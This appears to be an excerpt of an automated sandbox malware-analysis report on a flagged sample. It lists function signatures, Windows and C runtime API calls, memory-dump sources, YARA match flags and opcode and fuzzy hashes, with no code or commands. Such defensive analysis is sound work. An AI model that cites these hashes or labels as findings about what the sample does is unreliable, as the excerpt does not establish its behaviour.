                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 06a566422919fde8bbb4a74f006ecd224a419a071d7fde5da34e4d280e37661a
                                                                  • Instruction ID: 60f87c9bbb46473c49fb0fca4796eb6fa4c64bfbf1ce752bcaab8d65ef193160
                                                                  • Opcode Fuzzy Hash: 06a566422919fde8bbb4a74f006ecd224a419a071d7fde5da34e4d280e37661a
                                                                  • Instruction Fuzzy Hash: DAE09A31400118BBCF123F21EC09AAE3F26BB40760F40082AFD0521220CB368C20ABA8
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000A686,00479E6C), ref: 0047A67F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: c8f12b748f4eafbc4c80cd971892c9c8bdf82a68a2d75beb69863e58e69acb5c
                                                                  • Instruction ID: e1d19f5e06117762d45224356d4a3b367393c6acbeb954774a5c004f06a913fa
                                                                  • Opcode Fuzzy Hash: c8f12b748f4eafbc4c80cd971892c9c8bdf82a68a2d75beb69863e58e69acb5c
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: HeapProcess
                                                                  • String ID:
                                                                  • API String ID: 54951025-0
                                                                  • Opcode ID: d54e94ca6c65c4fbc014fe0a2db94ac05adb77bc8771e2669efbdf3701446e3e
                                                                  • Instruction ID: d3d79032133f7385be40c74b5d12a95caf0200806389fea8818f08d4a749258d
                                                                  • Opcode Fuzzy Hash: d54e94ca6c65c4fbc014fe0a2db94ac05adb77bc8771e2669efbdf3701446e3e
                                                                  • Instruction Fuzzy Hash: 1CA00471501101CF57404F355F4774D3FF555555D1715407F5415C5170D7344DD55F45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                                  • Instruction ID: b6b971e8dcff9447c842b3c40d434377d437698c64280aa2279a73f26397b8af
                                                                  • Opcode Fuzzy Hash: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                                  • Instruction Fuzzy Hash: 32429C75618381AFDBA4CF25C844B6BB7E9FF88704F08492EF9959B241D730E841CB59
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 347e2a96e40e19bcf8ca891402f80ff068160f31d07e64ce0ec55c56977f52a0
                                                                  • Instruction ID: 77bad83217d15ae3886ff660216ef2132648e2f45d59eea13f287e6ebfefd460
                                                                  • Opcode Fuzzy Hash: 347e2a96e40e19bcf8ca891402f80ff068160f31d07e64ce0ec55c56977f52a0
                                                                  • Instruction Fuzzy Hash: C6322A62D26F414DD723A638C92233AA758AFB73C4F15D737E819B5AA5EB29C4C34204
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                                  • Instruction ID: a61d6a78fe53c3895af0e8fa8ffc0599ea6c0a009c7ba884e8518585e76db300
                                                                  • Opcode Fuzzy Hash: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                                  • Instruction Fuzzy Hash: 2FD1A434718B498BDB69DF2988996EEB7E5FB88705F00422EE85BC7350DF30E5118B85
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                  • Instruction ID: 9f8e3c2f280ed1a7547d931d560e4b803db1210162c4265247621451d61796f4
                                                                  • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                  • Instruction Fuzzy Hash: C3D16E31518A488FDB59DF28C889AEAB7E1FF95310F04466EE84BCB255DF30E542CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                  • Instruction ID: 1a1364f7da59f3361ac37563f4fcfc5b7e69582467a5c90ce1b06216d771aecf
                                                                  • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                  • Instruction Fuzzy Hash: 8AB1B938724A455FCB99DB2AC4957BEB3D1FB89301F1842AFC84ACB245DB24F502CB85
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: 853b8e78be5990b9e96bbc9bfa21467ed82a22eecf0ea7e35723c7885504650d
                                                                  • Instruction ID: a932b1e9c819d0228a8f7a997fabeed40719152208bcf9dde75cfee04df4032a
                                                                  • Opcode Fuzzy Hash: 853b8e78be5990b9e96bbc9bfa21467ed82a22eecf0ea7e35723c7885504650d
                                                                  • Instruction Fuzzy Hash: C1B10A355007029BDF34AF65CC81BBB77A8EF44308F54457FE94386690E678AD86CB18
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                                                                  • Instruction ID: e728e957f478ee5ec49af0a9054d1c5d2e688b0308fec4561e191d5202b180ae
                                                                  • Opcode Fuzzy Hash: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                                                                  • Instruction Fuzzy Hash: 01A12E31608A4C8FDB55EF28C889BEA77E9FB58315F14466FE84AC7160EB30D644CB85
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFreeHeapLast
                                                                  • String ID: PATH$\
                                                                  • API String ID: 485612231-1896636505
                                                                  • Opcode ID: 465ea9bb79a158c39f48fa146287ff8407b0515b50f3690cbc26eb01393c3470
                                                                  • Instruction ID: 62fa1c06ada2c4902fb2099651cb5fa3ade80f10ba48cb2dc700c9e0b65d922d
                                                                  • Opcode Fuzzy Hash: 465ea9bb79a158c39f48fa146287ff8407b0515b50f3690cbc26eb01393c3470
                                                                  • Instruction Fuzzy Hash: 2F9115329042079EEF25BBA4CC01BAF7BA5AF12714F540D6FE810A6291FF7D8941875D
                                                                  APIs
                                                                    • Part of subcall function 00487531: RtlFreeHeap.NTDLL(00000000,00000000,?,004908E5,0047DE01,00000000,0047DE01,?,00490B86,0047DE01,00000007,0047DE01,?,0049107A,0047DE01,0047DE01), ref: 00487547
                                                                    • Part of subcall function 00487531: GetLastError.KERNEL32(0047DE01,?,004908E5,0047DE01,00000000,0047DE01,?,00490B86,0047DE01,00000007,0047DE01,?,0049107A,0047DE01,0047DE01), ref: 00487552
                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00487FC1
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00487FCE
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00487FE3
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00487FEE
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00487FF9
                                                                  • __dosmaperr.LIBCMT ref: 00488000
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048800B
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00488016
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00488028
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00488033
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00488064
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                                  • String ID:
                                                                  • API String ID: 2764183375-0
                                                                  • Opcode ID: d80457a980477534eab157239a79f37a51a761e028a0008290e35a57cbc6a72f
                                                                  • Instruction ID: 8c08d7e1299e36d31b7b4fc11a8bdeff1881340c1191341d03e115e0da5974b8
                                                                  • Opcode Fuzzy Hash: d80457a980477534eab157239a79f37a51a761e028a0008290e35a57cbc6a72f
                                                                  • Instruction Fuzzy Hash: C951F531804109FBDF11BFA5DC86AEE7B79EF41315F2048ABFA00A6111CB398E45DB69
                                                                  APIs
                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0047CEB5
                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0047CED7
                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0047CFE6
                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0047D0B8
                                                                  • _UnwindNestedFrames.LIBCMT ref: 0047D13C
                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0047D157
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 2123188842-393685449
                                                                  • Opcode ID: 938eae2b243c7ddf967cc52a92cbfd3c86646766fa954077736d86d1bff50e84
                                                                  • Instruction ID: 67bc9a02a16f012588b72a2dbf10858f6849f6dff354a732fb7a8d8e121ea13f
                                                                  • Opcode Fuzzy Hash: 938eae2b243c7ddf967cc52a92cbfd3c86646766fa954077736d86d1bff50e84
                                                                  • Instruction Fuzzy Hash: 19B14871C102099FCF29DFA5C8819EEBBB5AF04318F14815FE8196B212D739DA52CB99
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                  • String ID: bad locale name
                                                                  • API String ID: 3904239083-1405518554
                                                                  • Opcode ID: 55d9ea1169ca8ab5a9253481cbc73f634e32db2aedb73c2a86ef9abcaa2cbf59
                                                                  • Instruction ID: 679fc5baa0f7c3e9641eb7951cbfea8b0c527d8e6f2de2cb7a5688fe7d746106
                                                                  • Opcode Fuzzy Hash: 55d9ea1169ca8ab5a9253481cbc73f634e32db2aedb73c2a86ef9abcaa2cbf59
                                                                  • Instruction Fuzzy Hash: A6117270905199DFCB08DB98C861BFEB775BF41308F14855EE0162B382CBB95A00C7A9
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,00497207,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 00496FDD
                                                                  • __alloca_probe_16.LIBCMT ref: 00497098
                                                                  • __alloca_probe_16.LIBCMT ref: 00497127
                                                                  • __freea.LIBCMT ref: 00497172
                                                                  • __freea.LIBCMT ref: 00497178
                                                                  • __freea.LIBCMT ref: 004971AE
                                                                  • __freea.LIBCMT ref: 004971B4
                                                                  • __freea.LIBCMT ref: 004971C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                  • String ID:
                                                                  • API String ID: 127012223-0
                                                                  • Opcode ID: 20fc1306d58f3890c88c3273c3d21fa6203755f450b0de64a3ff94ebe7e6c207
                                                                  • Instruction ID: 53f95bc2201ee06f8ee9ebc118108ce19826c38abbb5a70f1fcb4a5ea7e493ce
                                                                  • Opcode Fuzzy Hash: 20fc1306d58f3890c88c3273c3d21fa6203755f450b0de64a3ff94ebe7e6c207
                                                                  • Instruction Fuzzy Hash: CE71F772A18205ABDF209F958C42FEF7FB99F45714F29046BE804A7381E63DDC418769
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00479BAD
                                                                  • __alloca_probe_16.LIBCMT ref: 00479BD9
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00479C18
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00479C35
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00479C74
                                                                  • __alloca_probe_16.LIBCMT ref: 00479C91
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00479CD3
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00479CF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                  • String ID:
                                                                  • API String ID: 2040435927-0
                                                                  • Opcode ID: adf66e3a1ec4e1f65b931fbb283453e2e3b61e838f294e961fae7c580100d155
                                                                  • Instruction ID: b7926db4229104ba5c4a562a8c21dea29570bb83b6ff1e00c5892740a75224b8
                                                                  • Opcode Fuzzy Hash: adf66e3a1ec4e1f65b931fbb283453e2e3b61e838f294e961fae7c580100d155
                                                                  • Instruction Fuzzy Hash: C551DE72500206BFEF219F64DC45FEF7BA9EF40750F25842AF91996250E7399C11CBA8
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: _strrchr
                                                                  • String ID:
                                                                  • API String ID: 3213747228-0
                                                                  • Opcode ID: 341f90471d2d8151e31f10acb5a6464dc63b623703efa1fb48c6f26ba17eb951
                                                                  • Instruction ID: afcf7b9301876e01fe7936094b951b19a22703599686abb27e05b42be8c31a75
                                                                  • Opcode Fuzzy Hash: 341f90471d2d8151e31f10acb5a6464dc63b623703efa1fb48c6f26ba17eb951
                                                                  • Instruction Fuzzy Hash: 1CB18872904655AFDB12AE24CC41BBF7FA5EF09704F1C496BE800AB382D3789D01C7A8
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004778B0
                                                                  • int.LIBCPMTD ref: 004778C9
                                                                    • Part of subcall function 00471E00: std::_Lockit::_Lockit.LIBCPMT ref: 00471E16
                                                                    • Part of subcall function 00471E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00471E40
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 00477909
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00477971
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID: (wG
                                                                  • API String ID: 3053331623-1104803144
                                                                  • Opcode ID: 2962736e8ff2237bb6642a46ccf194969dad4576072b5448793c5153efcce0b7
                                                                  • Instruction ID: 37f05cadf2e4a91bf53fb8a001c59f09a91848443480d305bb5350172fb22a63
                                                                  • Opcode Fuzzy Hash: 2962736e8ff2237bb6642a46ccf194969dad4576072b5448793c5153efcce0b7
                                                                  • Instruction Fuzzy Hash: D7312EB0D04209DBCB04DF98C991BEEBBB0BF48314F20865EE51977391DB395A40CBA5
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00477DD0
                                                                  • int.LIBCPMTD ref: 00477DE9
                                                                    • Part of subcall function 00471E00: std::_Lockit::_Lockit.LIBCPMT ref: 00471E16
                                                                    • Part of subcall function 00471E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00471E40
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 00477E29
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00477E91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID: O_G
                                                                  • API String ID: 3053331623-1360823879
                                                                  • Opcode ID: a76c1aa6a0fbfbe7fe56b067ba2a9744313d08ccf0dbc99b7a962428c8be558e
                                                                  • Instruction ID: 36f8b56684125b20ebcb65c427a97ebfc0b5bceb99ce6fa2bc4053f434eabc34
                                                                  • Opcode Fuzzy Hash: a76c1aa6a0fbfbe7fe56b067ba2a9744313d08ccf0dbc99b7a962428c8be558e
                                                                  • Instruction Fuzzy Hash: D1312CB0D00209DBCB04DF98C991BEEBBB0BF58314F20865EE41967391DB386E40CBA5
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,004889CC,0047DE01,CE3BFFFF,00000000,0047EC9B,00000000,?,00488BF6,00000022,FlsSetValue,0049CEC8,0049CED0,0047EC9B), ref: 0048897E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3664257935-537541572
                                                                  • Opcode ID: 000251a3f82d0e943e59c39cc9400b878e11ffae1cc41b61ac0643fb9a94741c
                                                                  • Instruction ID: e0b1ab9821fbcfe69a27e85f81dc48119b9d382294f55f304d281b74fd3398ce
                                                                  • Opcode Fuzzy Hash: 000251a3f82d0e943e59c39cc9400b878e11ffae1cc41b61ac0643fb9a94741c
